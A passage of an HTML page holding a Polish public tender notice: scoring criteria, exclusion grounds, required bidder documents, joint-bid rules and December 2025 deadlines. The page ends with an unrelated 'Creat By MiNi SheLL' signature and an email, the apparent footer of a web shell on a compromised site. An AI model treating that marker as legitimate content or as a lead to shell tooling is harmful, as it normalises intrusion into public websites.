przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na zasadach określonych w Rozdziale XII SWZ – dotyczy każdej części zamówienia<br/>2) spełniają warunki udziału w postępowaniu dotyczące:<br/>a) Zdolności do występowania w obrocie gospodarczym: Zamawiający nie wyznacza szczegółowego warunku w tym<br/>zakresie – dotyczy każdej części zamówienia,<br/>b) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie – dotyczy każdej części zamówienia<br/>c) Sytuacji ekonomicznej lub finansowej: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie – dotyczy<br/>każdej części zamówienia,<br/>UWAGA 1 – dotyczy wszystkich części zamówienia<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnienie wyżej wymienionego warunku<br/>Wykonawcy mogą wykazać łącznie.<br/>UWAGA 2 – dotyczy wszystkich części zamówienia<br/>W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy<br/>Pzp, powyższy warunek musi spełniać w całości podmiot udostępniający zasoby.<br/>d) Zdolności technicznej lub zawodowej: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.<br/>Dokumenty składane wraz z ofertą<br/>a) Formularz Oferty, wg wzoru Zamawiającego, o treści odpowiadającej załącznikowi nr 1 do SWZ. W przypadku Wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy składają jeden Formularz Ofertowy – dla poszczególnej części<br/>zamówienia.<br/>b) Formularz Cenowy - wg wzoru Zamawiającego, o treści odpowiadającej załącznikowi nr 1A -1J do SWZ. W przypadku<br/>Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy składają jeden Formularz Ofertowy – dla<br/>poszczególnej części zamówienia.<br/>c) Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy Pzp - wzór oświadczenia stanowi załącznik nr 2 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców – dla<br/>poszczególnej części zamówienia<br/>d) Oświadczenie podmiotu trzeciego składane na podstawie art. 125 ust. 5 ustawy Pzp - wzór oświadczenia stanowi załącznik nr 3<br/>do SWZ – dla poszczególnej części zamówienia<br/>e) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy<br/>Pzp - wzór oświadczenia stanowi załącznik nr 11 do SWZ – dla poszczególnej części zamówienia<br/>f) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik – dla poszczególnej części zamówienia<br/>g) Pełnomocnictwo w przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia – dla<br/>poszczególnej części zamówienia<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub<br/>podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem<br/>przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>h) Dokumenty potwierdzające, że zastrzeżone w ofercie intonacje stanowią tajemnicę przedsiębiorstwa – dla poszczególnej części zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokumenty składane na<br/>wezwanie Zamawiającego – dotyczy każdej części zamówienia: 1) W postępowaniu o udzielenie zamówienia Zamawiający żąda<br/>złożenia podmiotowych środków dowodowych na potwierdzenie: a) braku podstaw wykluczenia; b). spełniania warunków udziału w<br/>postępowaniu lub kryteriów selekcji, w formie określonej w Rozporządzeniu MRP i T z dn. 23.12.2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r.<br/>poz. 2415). 2). Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,<br/>nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych<br/>potwierdzających: a) brak podstaw wykluczenia: -oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(tj. Dz. U. z 2023 r. poz. 1689 z późn.zm) z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ; -odpis lub<br/>informację z Krajowego Rejestru Sądowego lub z CEIDG, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; UWAGA: Jeżeli z<br/>uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych<br/>przez Zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez<br/>Zamawiającego warunku udziału w postępowaniu. 3)Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych,<br/>jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu<br/>ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, dane<br/>umożliwiające dostęp do tych środków. 4) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o<br/>udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub<br/>niektórych podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach<br/>zamówienia, aktualnych na dzień ich złożenia. 5) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio<br/>podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do<br/>złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia. 6) Wykonawca nie jest<br/>zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki<br/>oraz potwierdzi ich prawidłowość i aktualność. 7) Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone<br/>wraz z tłumaczeniem na język polski. 8) Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać<br/>Zamawiającemu przy użyciu komunikacji elektronicznej, w zakresie i w sposób określony w Rozporządzeniu PR M z dnia 30.12.2020<br/>r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). 9) W zakresie nieuregulowanym ustawą Pzp lub SWZ do podmiotowych środków dowodowych składanych przez Wykonawcę<br/>w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia w sprawie podmiotowych środków dowodowych oraz<br/>rozporządzenia w sprawie środków komunikacji elektronicznej</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>a. oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/>b. sposób składania dokumentów w ofercie wspólnej:<br/>2. Dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z<br/>Wykonawców składających ofertę wspólną we własnym imieniu;<br/>3. Dokumenty wspólne takie jak np.: formularz ofertowy, formularz cenowy, dokumenty podmiotowe składa pełnomocnik<br/>Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną;<br/>4. Kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za<br/>zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców.<br/>5. Oferta wraz z załącznikami powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy. Oferta<br/>sporządzona w formie elektronicznej powinna być podpisana podpisem elektronicznym, zaś oferta sporządzona w postaci<br/>elektronicznej powinna być opatrzona podpisem zaufanym lub podpisem osobistym przez osobę uprawnioną, zgodnie z<br/>formą reprezentacji Wykonawcy określoną w rejestrze sądowym lub innym dokumencie, właściwym dla danej formy<br/>organizacyjnej Wykonawcy, albo przez osobę umocowaną (na podstawie pełnomocnictwa) przez osoby uprawnione.<br/>6. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub<br/>sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo<br/>podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poprzez oryginał należy rozumieć dokument<br/>podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby<br/>upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby<br/>upoważnioną/upoważnione.<br/>7. Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać<br/>&#34;Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do<br/>transakcji elektronicznych na rynku wewnętrznym (elDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający wymaga od wybranego Wykonawcy zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w Projektowanych postanowieniach umowy stanowiących Załącznik nr 4 do SWZ, które zostaną wprowadzone<br/>do treści tej umowy.<br/>2. Projektowane postanowienia umowy przed zawarciem zostaną uzupełnione o niezbędne informacje dotyczące w<br/>szczególności danych Wykonawcy, wynagrodzenia Wykonawcy, wysokości i formy zabezpieczenia należytego wykonania<br/>umowy i innych niezbędnych do zwarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-01 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-01 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com